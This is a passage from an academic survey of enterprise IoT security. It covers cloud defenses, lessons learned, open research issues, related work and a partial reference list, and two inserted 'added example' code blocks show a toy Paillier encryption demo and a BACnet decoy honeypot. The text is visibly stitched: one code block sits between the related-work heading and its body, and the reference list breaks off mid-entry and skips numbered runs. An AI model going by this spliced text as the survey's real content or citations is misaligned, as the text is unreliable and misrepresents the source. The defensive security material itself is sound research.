Several defenses have been proposed for threats that can impact cloud-based services. In this respect, several surveys have been conducted on the topic of cloud security, often highlighting attacks, defenses, and mitigation mechanisms relevant to E-IoT cloud services [311], [315]–[317], [319], [321], [323]. The majority of these works note that there are many ways to attack different types of cloud systems. As such, different mitigation strategies exist for each threat. For instance, to defend against data breaches, properly implemented encryption should be used by cloud services. Vendors should require strong passwords and authentication practices in their cloud services to address weak access control that could compromise users, integrators, and E-IoT systems. Further, as accounts may be compromised, some articles have suggested that two-factor authentication may add an additional layer of security to cloud services [328]. As browser vulnerabilities such as XSS and redirection attacks can impact web-based GUI interfaces, users should update browsers, have malware protection, and follow best practices to prevent web-based vulnerabilities. Surveys by Fernandes et al. and Kumar et al. specify mitigation strategies against cloud threats [317], [323]. For instance, APIs should be protected with good sanitation practices, secure development standards, signatures, and encryption. To prevent intrusion in cloud systems, the authors highlight that network-based, host-based, distributed, and hypervisor intrusion detection systems can be helpful. DDoS mitigation can improve the overall reliability of cloud services in case of volumetric attacks. Specifically, DDoS mitigation strategies may take the form of rate-limiting, proxy filtering, load balancing, crypto puzzles, and flexible network configuration depending on the cloud system and use case. As such, E-IoT vendors and manufacturers should follow these practices to guarantee the security of cloud-based components used in E-IoT.

Cloud hosting can also benefit from privacy-preserving techniques to protect a user's information. For instance, cloud service providers can provide an additional layer of mitigation by applying Homomorphic Encryption (HE) concepts to stored information [329]. With HE, concepts such as Partially Homomorphic Encryption (PHE), Somewhat Homomorphic Encryption (SWHE), and finally Fully Homomorphic Encryption (FHE) can be applied to improve data privacy. Specifically, PHE, SWHE, and FHE allow for a number of operations (depending on the type) on encrypted data without the need to decrypt the data for these operations. This allows users to store encrypted information without the risk of exposing sensitive information to untrusted cloud providers. While these approaches are experimental and require further research, they should be considered for cloud services for E-IoT systems and storage.
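To make the PHE idea concrete, the following added example (written for this survey, not code from [329] or from any cloud provider) uses the Paillier cryptosystem, an additively homomorphic PHE scheme, so that an untrusted cloud service can total per-camera event counts without ever holding a decryption key. The primes, event counts and the "cloud" role are constructed toy values; a deployment would use moduli of at least 2048 bits and a vetted library.

```python
"""Added example (not from the survey or any cloud provider): additive
homomorphic encryption with the Paillier cryptosystem, a partially
homomorphic (PHE) scheme, used here to let an untrusted cloud service sum
per-camera event counts without ever decrypting them. Key sizes and event
counts are constructed toy values; a real deployment needs 2048-bit moduli."""
from math import gcd
import secrets

def lcm(a, b):
    return a * b // gcd(a, b)

def keygen(p, q):
    """Paillier keys from two distinct primes p and q (constructed inputs).
    Public key: (n, g) with g = n + 1; private key: (lam, mu)."""
    n = p * q
    lam = lcm(p - 1, q - 1)
    mu = pow(lam, -1, n)       # valid simplification because g = n + 1
    return (n, n + 1), (lam, mu)

def encrypt(pub, m):
    """c = g^m * r^n mod n^2 with a fresh random r coprime to n."""
    n, g = pub
    n2 = n * n
    while True:
        r = secrets.randbelow(n - 1) + 1
        if gcd(r, n) == 1:
            break
    return (pow(g, m, n2) * pow(r, n, n2)) % n2

def decrypt(pub, priv, c):
    """m = L(c^lam mod n^2) * mu mod n, where L(x) = (x - 1) / n."""
    n, _ = pub
    lam, mu = priv
    x = pow(c, lam, n * n)
    return ((x - 1) // n * mu) % n

def add_encrypted(pub, c1, c2):
    """Homomorphic addition: the product of ciphertexts encrypts m1 + m2.
    This is the only operation the cloud performs; it never sees plaintext."""
    n, _ = pub
    return (c1 * c2) % (n * n)

def cloud_sum(pub, ciphertexts):
    """What the untrusted cloud service runs over uploaded ciphertexts,
    holding only the public key."""
    total = encrypt(pub, 0)
    for c in ciphertexts:
        total = add_encrypted(pub, total, c)
    return total

def demo_event_totals(counts, p=10007, q=10009):
    """End-to-end: the user encrypts per-camera counts, the cloud sums the
    ciphertexts, and only the key holder decrypts the total."""
    pub, priv = keygen(p, q)
    cts = [encrypt(pub, m) for m in counts]
    return decrypt(pub, priv, cloud_sum(pub, cts))

if __name__ == "__main__":
    # Constructed: daily motion events from three cameras, summed in the cloud.
    print(demo_event_totals([17, 42, 8]))   # 67
```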
VIII. LESSONS LEARNED AND OPEN ISSUES
In this survey, we analyzed the threats and defenses concerning individual layers. However, an attacker can follow a cross-layer approach, which means he/she can attack multiple layers at once. So the security of E-IoT systems should be considered holistically. In this section, we cover lessons learned and open issues in state-of-the-art E-IoT security research.
A. Lessons Learned
Customized Deployments.
E-IoT deployments are diverse and complex. There may be unique threats from deployment to deployment, especially with the numerous use cases in E-IoT. For instance, a lighting control E-IoT environment will be different from a smart media management system in terms of vulnerabilities. Specifically, a lighting system may rely more heavily on serial-based communication interfaces in every room than media management that relies on touchpanels and mobile interfaces. Further, even in a lighting system, a purely serial-based system will have different threats and vulnerabilities than a lighting control system with Zigbee/Z-Wave interfaces. Many attacks (e.g., node-capture attacks, sensory channel attacks) may have unique system-to-system consequences. Namely, if safety or motorization devices rely on E-IoT sensors, an attacker may create a much bigger safety issue if these sensors are compromised. The degree of customization in E-IoT means that one deployment's solutions and security guidelines are not applicable for all deployments.
Legacy Systems.
Legacy systems are systems considered to be outdated, discontinued, and that no longer receive software or security updates. With companies such as Crestron established since the 70's, it is expected that there are legacy E-IoT systems installed worldwide [34]. These systems may not receive updates for several reasons. For instance, an E-IoT system may simply be discontinued or the manufacturer may no longer exist (e.g., LiteTouch lighting control systems) [252]. Alternatively, systems have frequent updates and a user may choose not to update because of the cost of the update (e.g., new devices, software, updated drivers). For example, if an entire building is wired to function with a legacy system, re-wiring and re-programming may be a costly endeavor as opposed to simply keeping an older E-IoT system. In other cases, discontinued devices may not work on newer systems (e.g., driver availability) and a user might choose to keep the current E-IoT system without updating to keep control of these integrated devices. E-IoT needs unique solutions that can provide protection to legacy E-IoT systems which cannot be updated.
Reliance on Integrators.
In E-IoT systems, consumers rely upon integrators. This reliance on integrators may create attack scenarios where an E-IoT system is compromised because of this trust. For instance, bad account management could allow attackers to compromise one or multiple systems purely due to integrators and remote support tooling. Additionally, as integrators handle devices before installation, they can be considered part of the supply chain. This adds another stage to the deployment process where devices may be compromised by an attacker or a malicious employee of an installation company. Integrators maintain and diagnose E-IoT devices in case of any issues, working directly with the client. As such, there is very little oversight on how well systems are configured. As poorly-configured devices pose a threat to E-IoT systems, a method for auditing E-IoT system security may be necessary to guarantee systems are properly configured. Further, more research into E-IoT security can assist vendors in evaluating existing best practices for integrators and developing new best practices. Finally, as E-IoT relies very heavily on integrators, new solutions are needed to protect end-users against attacks that may come from malicious insiders or poor configuration.

(Near) Future E-IoT Attacks.

Attackers are in constant search of new systems to attack, with nation-state attackers having the capabilities to perform attacks never thought to be viable before. Attacks have already been observed that target E-IoT devices among other devices, with Mirai being one of the most well-known. In Mirai, research has shown that CCTV systems, specifically DVRs and NVRs, were targeted in the password banks [289]. These devices were possibly configured with default passwords in many cases, which reflects the need for auditing and better research on E-IoT. If research is not done, E-IoT systems may end up being used in large-scale attacks, such as DDoS. Attacks would not be limited to DDoS; ransomware attacks may be different in E-IoT, both rendering a system inoperable and requiring an integrator to repair the affected system. In more advanced attacks, it may be possible for an attacker to compromise touchscreens, keypads, controllers, and other devices for cryptomining through malicious firmware or a malicious controller. Another recent and notable example of an attack has been coined the "SolarWinds" attack, where thousands of devices were compromised through vendor tool updates [330], [331]. It may be possible for E-IoT to be affected by similar attacks in the future if precautions are not taken. This shows that trusted software must also be held to high scrutiny. Finally, there are the privacy aspects of E-IoT. The cost of E-IoT systems means that clients may be wealthy professionals, well-funded companies, or otherwise lucrative targets for attackers, especially in E-IoT smart homes. An attacker may predict the cost of an E-IoT system and attack a target that can benefit them more (e.g., businessmen, politicians, wealthy individuals, companies), easily searching by vendor online and targeting an exposed, poorly configured system.
B. Open Issues
Proprietary Communication.
E-IoT supports a diversity of protocols, from publicly-known to proprietary. However, proprietary protocols in E-IoT are often closed-source, with no public specification. Additionally, E-IoT hardware and software are often unavailable to the public. Researching E-IoT communication can be difficult without vendor cooperation, as many of the protocols and practices need to be reverse-engineered. As a result, many E-IoT components and protocols have not been properly investigated, and many attacks have not been discovered and addressed. For instance, serial-based proprietary protocols such as Cresnet are used extensively in Crestron systems; however, little to no security research exists on this protocol. This case is also valid for many wireless protocols highlighted in Section V, such as RadioRa, Top-Dog RF, and infiNET, where the security methodology used is unknown. It is a realistic assumption that vulnerabilities must exist given the age and lack of oversight of many of these proprietary protocols. The absence of known vulnerabilities is not due to strong design but to security through obscurity. Unfortunately, once adversaries find vulnerabilities in these protocols, it may lead to easily-compromised systems, as security through obscurity provides very little legitimate protection. Much more research and collaboration with vendors are needed to assess the security of these protocols and develop security tools (e.g., monitoring, auditing).
Proprietary Software.
In a similar manner to protocols, research on E-IoT software is a challenge as much of E-IoT development is closed-source with minimal external resources available. Further, even if research is done on one E-IoT system, different systems will follow different integration and configuration practices. For instance, components like drivers are different in every system, and the implementation may allow for completely different attacks in each system. We found that many E-IoT systems have operated under security through obscurity for their software in addition to communication protocols, a practice that is currently insufficient. As such, it may be necessary to find flaws in E-IoT software components and correct these flaws before malicious actors compromise E-IoT installations. It may be a good idea for vendors to cooperate with research and academic communities and provide closed-source software to prevent attacks before they occur. In comparison to more open industries, in E-IoT, an attacker that acquires source code for E-IoT devices may have a running start in compromising these devices before security researchers have even acknowledged the problem. In response to looming threats, vendors could also offer hackathons, bug bounties, and reward responsible disclosures of vulnerabilities that can affect their systems.
Honeypots as a Defense Strategy.
It may be possible for honeypots to offer insight and warnings on possible attackers against E-IoT systems and complement existing security mechanisms. Litchfield et al. noted that honeypots can vary between different applications, highlighting that high-interaction honeypots are not suitable in some applications [332]. Other solutions may be possible, for instance, Conpot, a honeypot system developed by the Honeynet Project supporting industrial protocols such as BACnet, EtherNet/IP, and Modbus. These developments are applicable in E-IoT installations as honeypot frameworks may be expanded to work with less-known proprietary E-IoT protocols [333], [334]. For instance, Mays et al. proposed a solution to defend home and building automation systems using decoy networks [159]. In this work, researchers created a honeypot network on the smart automation Insteon protocol to hide communication using a dummy network and hide genuine network traffic from attackers. Such approaches could apply to E-IoT and other custom systems that rely heavily on physical components, and could help to understand the behavior of attackers and thus secure E-IoT systems.
IX. RELATED WORK
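As an added illustration of the honeypot idea raised in the Open Issues discussion above (this is not code from the paper, from Conpot, or from any vendor), the following Python sketch is a low-interaction BACnet/IP discovery honeypot: it parses Who-Is probes, logs the source and the requested instance range, and answers with an I-Am so that a scanner sees a decoy device. The frame layout follows BACnet/IP (BVLC, NPDU, APDU); the device instance, vendor id, and sample packets are constructed values, not captured traffic.

```python
"""Low-interaction BACnet/IP discovery honeypot (added example).

Parses Who-Is requests, records who is probing the building network, and
answers with an I-Am so a scanner sees a decoy device. Sample packets
below are constructed, not captured traffic.
"""
import struct
from dataclasses import dataclass, field
from typing import Optional

BVLC_TYPE = 0x81                 # BACnet/IP
BVLC_UNICAST = 0x0A              # Original-Unicast-NPDU
BVLC_BROADCAST = 0x0B            # Original-Broadcast-NPDU
PDU_UNCONFIRMED = 0x10           # Unconfirmed-Request PDU type
SVC_I_AM, SVC_WHO_IS = 0x00, 0x08
OBJ_DEVICE = 8


def _apdu_offset(buf: bytes) -> int:
    """Return the offset of the APDU by walking the variable-length NPDU."""
    pos = 4                                   # BVLC header is 4 bytes
    version, control = buf[pos], buf[pos + 1]
    if version != 1:
        raise ValueError("unsupported NPDU version")
    pos += 2
    if control & 0x20:                        # DNET(2) + DLEN(1) + DADR
        pos += 3 + buf[pos + 2]
    if control & 0x08:                        # SNET(2) + SLEN(1) + SADR
        pos += 3 + buf[pos + 2]
    if control & 0x20:
        pos += 1                              # hop count follows the source
    return pos


def _ctx_unsigned(buf: bytes, pos: int, tag_no: int):
    """Decode a context-tagged unsigned (low 3 bits of the tag byte = length)."""
    tag = buf[pos]
    length = tag & 0x07
    if tag >> 4 != tag_no or not (tag & 0x08) or not 1 <= length <= 4:
        raise ValueError("unexpected tag")
    end = pos + 1 + length
    return int.from_bytes(buf[pos + 1:end], "big"), end


def parse_who_is(packet: bytes) -> Optional[dict]:
    """Return {'low','high','broadcast'} for a well-formed Who-Is, else None."""
    if len(packet) < 8 or packet[0] != BVLC_TYPE:
        return None
    func, length = packet[1], struct.unpack("!H", packet[2:4])[0]
    if func not in (BVLC_UNICAST, BVLC_BROADCAST) or length != len(packet):
        return None                           # wrong function or truncated frame
    try:
        pos = _apdu_offset(packet)
        if packet[pos] != PDU_UNCONFIRMED or packet[pos + 1] != SVC_WHO_IS:
            return None
        pos += 2
        low = high = None                     # no range means "everyone answer"
        if pos < len(packet):
            low, pos = _ctx_unsigned(packet, pos, 0)
            high, pos = _ctx_unsigned(packet, pos, 1)
        if pos != len(packet):
            return None                       # trailing bytes: not a clean Who-Is
    except (ValueError, IndexError):
        return None
    return {"low": low, "high": high, "broadcast": func == BVLC_BROADCAST}


def build_i_am(instance: int, vendor_id: int, max_apdu: int = 1476) -> bytes:
    """Encode an I-Am for device `instance` as an Original-Broadcast-NPDU."""
    object_id = (OBJ_DEVICE << 22) | (instance & 0x3FFFFF)
    apdu = bytes([PDU_UNCONFIRMED, SVC_I_AM])
    apdu += b"\xC4" + struct.pack("!I", object_id)   # app tag 12, object id
    apdu += b"\x22" + struct.pack("!H", max_apdu)    # app tag 2, unsigned(2)
    apdu += b"\x91\x03"                              # app tag 9, no segmentation
    apdu += b"\x22" + struct.pack("!H", vendor_id)   # app tag 2, vendor id
    npdu = b"\x01\x20\xFF\xFF\x00\xFF"               # global broadcast, hops=255
    body = npdu + apdu
    return bytes([BVLC_TYPE, BVLC_BROADCAST]) + struct.pack("!H", 4 + len(body)) + body


@dataclass
class DiscoveryHoneypot:
    """Decoy BACnet device: logs every probe, answers only in-range Who-Is."""
    instance: int
    vendor_id: int
    log: list = field(default_factory=list)

    def handle(self, src: str, packet: bytes) -> Optional[bytes]:
        who = parse_who_is(packet)
        if who is None:
            self.log.append({"src": src, "event": "malformed", "len": len(packet)})
            return None
        in_range = who["low"] is None or who["low"] <= self.instance <= who["high"]
        self.log.append({"src": src, "event": "who-is", "answered": in_range, **who})
        return build_i_am(self.instance, self.vendor_id) if in_range else None


# Constructed probes: an unbounded Who-Is, a ranged Who-Is (0..100), and junk.
WHO_IS_ALL = bytes.fromhex("810b000c0120ffff00ff1008")
WHO_IS_RANGE = bytes.fromhex("810b00100120ffff00ff100809001964")
JUNK = bytes.fromhex("810b0004")

if __name__ == "__main__":
    pot = DiscoveryHoneypot(instance=1234, vendor_id=999)   # constructed identity
    for src, pkt in [("10.0.0.5", WHO_IS_ALL), ("10.0.0.5", WHO_IS_RANGE), ("10.0.0.9", JUNK)]:
        reply = pot.handle(src, pkt)
        print(src, pot.log[-1], None if reply is None else reply.hex())
```

In a deployment the `handle` call would sit behind a UDP socket bound to port 47808, and the log would feed the site's monitoring so that unexpected discovery traffic on the automation network is visible to the integrator.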
The security of IoT smart devices has been an ongoing topic of research in recent years. As such, a number of IoT security surveys have been conducted [335]–[346]. Most of these surveys cover attacks, defenses, security challenges and general counter-measures in IoT; others are more specific. For instance, a survey by Hassan et al. highlights current research trends in IoT security [338]. Other work has focused on IoT security aspects, such as the survey by Deogirikar et al., which focused specifically on known IoT attacks [341]. Individually, as early as 2013, works have highlighted threats in smart devices, and how attackers always search for new, unexplored threat vectors [5]–[7], [9], [11]–[14]. However, very little ongoing research has focused on specific vulnerabilities targeting E-IoT systems or proprietary technologies. Often, vendors will only guarantee security and perform internal security analysis in their own devices [291].

Some topics covered in this survey have had dedicated surveys examine attacks, defenses and threats for each topic. For instance, several surveys have covered jamming attacks and defenses against wireless communication [207]–[210]. Surveys on communication are also relevant, with a number of surveys covering attacks, risks, and defense mechanisms for Bluetooth communication [176], [192]–[194]. Sensory channels are also an active subject of research and relevant to E-IoT. As such, related surveys on the security of sensory channels touch upon subjects beyond E-IoT applications such as WSNs and large-scale sensor deployments [113]–[123]. Further, as cloud computing is an active topic of research, a number of relevant surveys have also covered cloud computing threats [309]–[322]. Other works focus on cloud defense mechanisms, applying to different use cases beyond the scope of this survey and E-IoT applications [311], [315], [317], [319], [321].
Our work differs from previously discussed works as this survey focuses on the insecurities, possible threats, and defenses applicable to E-IoT. To the best of our knowledge, this is the first work that focuses solely on E-IoT systems and their security, categorizing E-IoT systems into four unique layers. Specifically, we categorize E-IoT components into four distinct layers: (1) the E-IoT Devices layer, (2) the Communications layer, (3) the Monitoring and Applications layer, and (4) the Business layer. We take this approach as E-IoT system architecture differs from many IoT systems, as highlighted in Section II. Further, we present a threat model for each distinct layer of E-IoT, as each layer may present different threats and require different capabilities from attackers.
X. CONCLUSION
The rising popularity of smart systems has led to millions of users worldwide interacting with smart devices on a day-to-day basis. Many of these devices are commodity, off-the-shelf systems (e.g., Google Home, Samsung SmartThings), easily maintained and installed by the average end-user in small deployments. However, while easy to install, commodity systems are limited and do not provide a viable solution for more sophisticated applications. For more extensive installations, E-IoT systems provide custom-installed solutions to fit a client's needs. As such, systems such as Crestron, Control4, RTI, and Savant offer a solution for more sophisticated applications (e.g., complete lighting control, A/V management, managed CCTV security), where commodity systems are insufficient. For this reason, E-IoT systems are common in locations such as high-end smart homes, government and private offices, yachts, and conference rooms. In contrast to commodity systems, E-IoT systems are usually proprietary, costly, closed source, and more robust for their configured use cases. However, even with their popularity, very little research has focused on the overall security of E-IoT systems. Namely, no study in the literature provides a complete overview of E-IoT systems, their components, threats, and relevant vulnerabilities. To address this research gap, motivate further research, and raise awareness on E-IoT insecurities, this work focused solely on E-IoT systems. Specifically, we discussed E-IoT components, vulnerabilities, and their security implications. To provide a better analysis of E-IoT, we divided E-IoT systems into four layers: E-IoT Devices Layer, Communications Layer, Monitoring and Applications Layer, and Business Layer. We considered E-IoT components at every layer, the associated threat models, attacks, and defense mechanisms.
We also presented critical observations on E-IoT security and provided a list of open research problems that require further research. We believe this study will raise awareness on E-IoT and E-IoT security, and motivate further research.

ACKNOWLEDGMENTS
This work is partially supported by the US National Science Foundation (Awards: NSF-CAREER-CNS-1453647, NSF-1663051, and NSF-1718116). The views are those of the authors only.

REFERENCES

[1] H. Aksu, L. Babun, M. Conti, G. Tolomei, and A. S. Uluagac. Advertising in the IoT Era: Vision and Challenges. IEEE Communications Magazine, 2018.
[2] The number of smart homes in Europe and North America reached 45 million in 2017. https://iotbusinessnews.com/2018/09/24/20413-the-number-of-smart-homes-in-europe-and-north-america-reached-45-million-in-2017/, Sept. 2018. Online: Accessed 10-December-2019.
[3] Mohamed Sultan. Smart to smarter: Smart home systems history, future and challenges. Online: Accessed 10-December-2019.
[4] Leonardo Babun, Amit Kumar Sikder, Abbas Acar, and A. Selcuk Uluagac. IoTDots: A digital forensics framework for smart environments. CoRR, 2018.
[5] Leonardo Babun, Hidayet Aksu, and A. Selcuk Uluagac. Detection of counterfeit and compromised devices using system and function call tracing techniques. (10027697), July 2018.
[6] Leonardo Babun, Hidayet Aksu, and A. Selcuk Uluagac. Method of Resource-limited Device and Device Class Identification using System and Function Call Tracing Techniques, Performance, and Statistical Analysis. (10242193), March 2019.
[7] Leonardo Babun, Hidayet Aksu, and A. Selcuk Uluagac. A System-Level Behavioral Detection Framework for Compromised CPS Devices: Smart-Grid Case. ACM Trans. Cyber-Phys. Syst., 4(2), Nov. 2019.
[8] Kyle Denney, Enes Erdin, Leonardo Babun, and A. Selcuk Uluagac. Dynamically Detecting USB Attacks in Hardware: Poster. In Proceedings of the 12th Conference on Security and Privacy in Wireless and Mobile Networks, pages 328–329, 2019.
[9] Leonardo Babun, Z. Berkay Celik, Patrick McDaniel, and A. Selcuk Uluagac. Real-time analysis of privacy-(un)aware IoT applications. Proceedings on Privacy Enhancing Technologies, 2021(1):145–166, Jan. 2021.
[10] Kyle Denney, Enes Erdin, Leonardo Babun, Michael Vai, and Selcuk Uluagac. USB-Watch: A dynamic hardware-assisted USB threat detection framework. In International Conference on Security and Privacy in Communication Systems, pages 126–146. Springer, 2019.
[11] Juan Lopez, Leonardo Babun, Hidayet Aksu, and A. Selcuk Uluagac. A survey on function and system call hooking approaches. Journal of Hardware and Systems Security, 1(2):114–136, 2017. Accessed: 11-17-2018.
[12] C. Kaygusuz, L. Babun, H. Aksu, and A. S. Uluagac. Detection of compromised smart grid devices with machine learning and convolution techniques. In , pages 1–6, May 2018.
[13] Amit Kumar Sikder, Leonardo Babun, Hidayet Aksu, and A. Selcuk Uluagac. Aegis: A context-aware security framework for smart home systems. In Proceedings of the 35th Annual Computer Security Applications Conference, 2019.
[14] Z. Berkay Celik, Leonardo Babun, Amit Kumar Sikder, Hidayet Aksu, Gang Tan, Patrick McDaniel, and A. Selcuk Uluagac. Sensitive information tracking in commodity IoT. In , pages 1687–1704, 2018.
[15] M. A. N. Abrishamchi, A. H. Abdullah, A. David Cheok, and K. S. Bielawski. Side channel attacks on smart home systems: A short overview. In IECON 2017 - 43rd Annual Conference of the IEEE Industrial Electronics Society, pages 8144–8149, Oct. 2017.
[16] Abbas Acar, Hossein Fereidooni, Tigist Abera, Amit Kumar Sikder, Markus Miettinen, Hidayet Aksu, Mauro Conti, Ahmad-Reza Sadeghi, and Selcuk Uluagac. Peek-a-boo: I see your smart home activities, even encrypted! In Proceedings of the 13th ACM Conference on Security and Privacy in Wireless and Mobile Networks, WiSec '20, pages 207–218. ACM, 2020.
[17] A. Acar, H. Aksu, A. S. Uluagac, and K. Akkaya. WACA: Wearable-assisted continuous authentication. In , pages 264–269, May 2018.
[18] A. K. Sikder, H. Aksu, and A. S. Uluagac. A context-aware framework for detecting sensor-based threats on smart devices. IEEE Transactions on Mobile Computing, 19(2):245–261, Feb. 2020.
[19] Amit Kumar Sikder, Giuseppe Petracca, Hidayet Aksu, Trent Jaeger,
and A. Selcuk Uluagac. A survey on sensor-based threats to Internet-of-Things (IoT) devices and applications. CoRR, abs/1802.02041, 2018.
[20] A. S. Uluagac, V. Subramanian, and R. Beyah. Sensory channel threats to cyber physical systems: A wake-up call. In IEEE Conference on Communications and Network Security (CNS), 2014, pages 301–309.
[21] Z. Berkay Celik, Leonardo Babun, Amit Kumar Sikder, Hidayet Aksu, Gang Tan, Patrick McDaniel, and A. Selcuk Uluagac. Sensitive information tracking in commodity IoT. In , Baltimore, MD, 2018.
[22] AKM Iqtidar Newaz, Amit Kumar Sikder, Mohammad Ashiqur Rahman, and A. Selcuk Uluagac. HealthGuard: A machine learning-based security framework for smart healthcare systems. In , 2019.
[23] AKM Newaz, Amit Kumar Sikder, Mohammad Ashiqur Rahman, and A. Selcuk Uluagac. A survey on security and privacy issues in modern healthcare systems: Attacks and defenses. arXiv preprint arXiv:2005.07359, 2020.
[24] AKM Iqtidar Newaz, Amit Kumar Sikder, Leonardo Babun, and A. Selcuk Uluagac. HEKA: A novel intrusion detection system for attacks to personal medical devices. In IEEE Conference on Communications and Network Security (CNS), 2020.
[25] Z. B. Celik, P. McDaniel, G. Tan, L. Babun, and A. S. Uluagac. Verifying Internet of Things Safety and Security in Physical Spaces. IEEE Security & Privacy.
[26] Amit Kumar Sikder, Leonardo Babun, Z. Berkay Celik, Abbas Acar, Hidayet Aksu, Patrick McDaniel, Engin Kirda, and A. Selcuk Uluagac. Kratos: Multi-user multi-device-aware access control system for the smart home. In , 2020.
[27] L. Babun, H. Aksu, L. Ryan, K. Akkaya, E. S. Bentley, and A. S. Uluagac. Z-IoT: Passive device-class fingerprinting of ZigBee and Z-Wave IoT devices. In , pages 1–7, 2020.
[28] J. Myers, L. Babun, E. Yao, S. Helble, and P. Allen. MAD-IoT: Memory anomaly detection for the Internet of Things. In , pages 1–6, 2019.
[29] K. Denney, L. Babun, and A. S. Uluagac. USB-Watch: A Generalized Hardware-Assisted Insider Threat Detection Framework. Journal of Hardware and Systems Security, 2020.
[30] AKM Newaz, Nur Imtiazul Haque, Amit Kumar Sikder, Mohammad Ashiqur Rahman, and A. Selcuk Uluagac. Adversarial attacks to machine learning-based smart healthcare systems. arXiv preprint arXiv:2010.03671, 2020.
[31] AKM Newaz, Amit Kumar Sikder, Mohammad Ashiqur Rahman, and A. Selcuk Uluagac. A survey on security and privacy issues in modern healthcare systems: Attacks and defenses. arXiv preprint arXiv:2005.07359, 2020.
[32] AKM Iqtidar Newaz, Amit Kumar Sikder, Leonardo Babun, and A. Selcuk Uluagac. HEKA: A novel intrusion detection system for attacks to personal medical devices. In , pages 1–9. IEEE, 2020.
[33] AKM Iqtidar Newaz, Amit Kumar Sikder, Mohammad Ashiqur Rahman, and A. Selcuk Uluagac. HealthGuard: A machine learning-based security framework for smart healthcare systems. In
Journal of Network and Computer Applications, page 102779, 2020.
[53] Muhammad Junaid Farooq and Quanyan Zhu. IoT supply chain security: Overview, challenges, and the road ahead. arXiv preprint arXiv:1908.07828
IEEE Spectrum, 49(6):16–17, 2012.
[56] Shivam Bhasin and Francesco Regazzoni. A survey on hardware trojan detection techniques. In , pages 2021–2024. IEEE, 2015.
[57] Mohammad Tehranipoor and Farinaz Koushanfar. A survey of hardware trojan taxonomy and detection. IEEE Design & Test of Computers, 27(1):10–25, 2010.
[58] Samuel T. King, Joseph Tucek, Anthony Cozzie, Chris Grier, Weihang Jiang, and Yuanyuan Zhou. Designing and implementing malicious hardware. LEET, 8:1–8, 2008.
[59] Jordan Robertson and Michael Riley. The big hack: How China used a tiny chip to infiltrate US companies. Bloomberg Businessweek, 4, 2018.
[60] K. Yang, D. Forte, and M. M. Tehranipoor. Protecting endpoint devices in IoT supply chain. In , pages 351–356, 2015.
[61] Kun Yang, Domenic Forte, and Mark Tehranipoor. ReSC: An RFID-enabled solution for defending IoT supply chain. 23(3), February 2018.
[62] Kun Yang, Domenic Forte, and Mark M. Tehranipoor. CDTA: A comprehensive solution for counterfeit detection, traceability, and authentication in the IoT supply chain. 22(3), April 2017.
[63] M. Chamekh, M. Hamdi, S. El Asmi, and T. Kim. Secured distributed IoT based supply chain architecture. In , pages 199–202, 2018.
[64] Crestron. TSW model touchscreen manual. https://bit.ly/3mcRNrI, 2020. Online: Accessed 20-June-2020.
[65] Control4. Control4 ZigBee: The definitive magic button press guide. https://technet.genesis-technologies.ch/control4-zigbee-the-definitive-guide/, 2013. Online: Accessed 20-June-2019.
[66] M. V. Bharathi, R. C. Tanguturi, C. Jayakumar, and K. Selvamani. Node capture attack in wireless sensor network: A survey. In , pages 1–3, 2012.
[67] C. Wang, D. Wang, Y. Tu, G. Xu, and H. Wang. Understanding node capture attacks in user authentication schemes for wireless sensor networks. IEEE Transactions on Dependable and Secure Computing, pages 1–1, 2020.
[68] Tamara Bonaci, Linda Bushnell, and Radha Poovendran. Probabilistic analysis of covering and compromise in a node capture attack. Network Security Lab (NSL), Seattle, WA, Technical Report, 1, 2010.
[69] T. Bonaci, L. Bushnell, and R. Poovendran. Node capture attacks in wireless sensor networks: A system theoretic approach. In , pages 6765–6772, 2010.
[70] Pradip De, Yonghe Liu, and Sajal K. Das. Deployment-aware modeling of node compromise spread in wireless sensor networks using epidemic theory. ACM Transactions on Sensor Networks (TOSN), 5(3):1–33, 2009.
[71] D. S. Kim, Y. K. Suh, and J. S. Park. Toward assessing vulnerability and risk of sensor networks under node compromise. In , pages 740–744, 2007.
[72] A. K. Mishra and A. K. Turuk. Adversary information gathering model for node capture attack in wireless sensor networks. In , pages 1–5, 2011.
[73] A. Ramos, B. Aquino, M. Lazar, R. H. Filho, and J. J. P. C. Rodrigues. A quantitative model for dynamic security analysis of wireless sensor networks. In GLOBECOM 2017 - 2017 IEEE Global Communications Conference, pages 1–6, 2017.
[74] Ingram Micro. 4 innovations in theft and loss prevention. https://imaginenext.ingrammicro.com/iot/4-innovations-in-theft-and-loss-prevention, 2019. Online: Accessed 22-September-2020.
[75] François-Xavier Standaert. Introduction to side-channel attacks. In Secure Integrated Circuits and Systems, pages 27–42. Springer, 2010.
[76] Peter Smulders. The threat of information theft by reception of electromagnetic radiation from RS-232 cables. Computers & Security, 9(1):53–58, 1990.
[77] Shian-Uei Hwu and Donald R. Wilton. Electromagnetic scattering and radiation by arbitrary configurations of conducting bodies and wires. Technical report, San Diego State Univ Foundation CA, 1988.
[78] Wim Van Eck. Electromagnetic radiation from video display units: An eavesdropping risk? Computers & Security, 4(4):269–286, 1985.
[79] Markus G. Kuhn. Electromagnetic eavesdropping risks of flat-panel displays. In International Workshop on Privacy Enhancing Technologies
Commun. ACM, 58(2):15–17, January 2015.
[82] Yi Xu, Jan-Michael Frahm, and Fabian Monrose. Watching the watchers: Automatically inferring TV content from outdoor light effusions. In Proceedings of the 2014 ACM SIGSAC Conference on Computer and Communications Security, pages 418–428, 2014.
[83] Mingshen Sun, Min Zheng, John C. S. Lui, and Xuxian Jiang. Design and implementation of an Android host-based intrusion prevention system. In Proceedings of the 30th Annual Computer Security Applications Conference, pages 226–235, 2014.
[84] Xiaolei Wang, Yuexiang Yang, Yingzhi Zeng, Chuan Tang, Jiangyong Shi, and Kele Xu. A novel hybrid mobile malware detection system integrating anomaly detection with misuse detection. In Proceedings of the 6th International Workshop on Mobile Cloud Computing and Services, pages 15–22, 2015.
[85] William Enck, Peter Gilbert, Seungyeop Han, Vasant Tendulkar, Byung-Gon Chun, Landon P. Cox, Jaeyeon Jung, Patrick McDaniel, and Anmol N. Sheth. TaintDroid: An information-flow tracking system for realtime privacy monitoring on smartphones. ACM Transactions on Computer Systems (TOCS), 32(2):1–29, 2014.
[86] Wen-Chieh Wu and Shih-Hao Hung. DroidDolphin: A dynamic Android malware detection framework using big data and machine learning. In Proceedings of the 2014 Conference on Research in Adaptive and Convergent Systems, pages 247–252, 2014.
[87] Zhi Xu and Sencun Zhu. SemaDroid: A privacy-aware sensor management framework for smartphones. In Proceedings of the 5th ACM Conference on Data and Application Security and Privacy, pages 61–72, 2015.
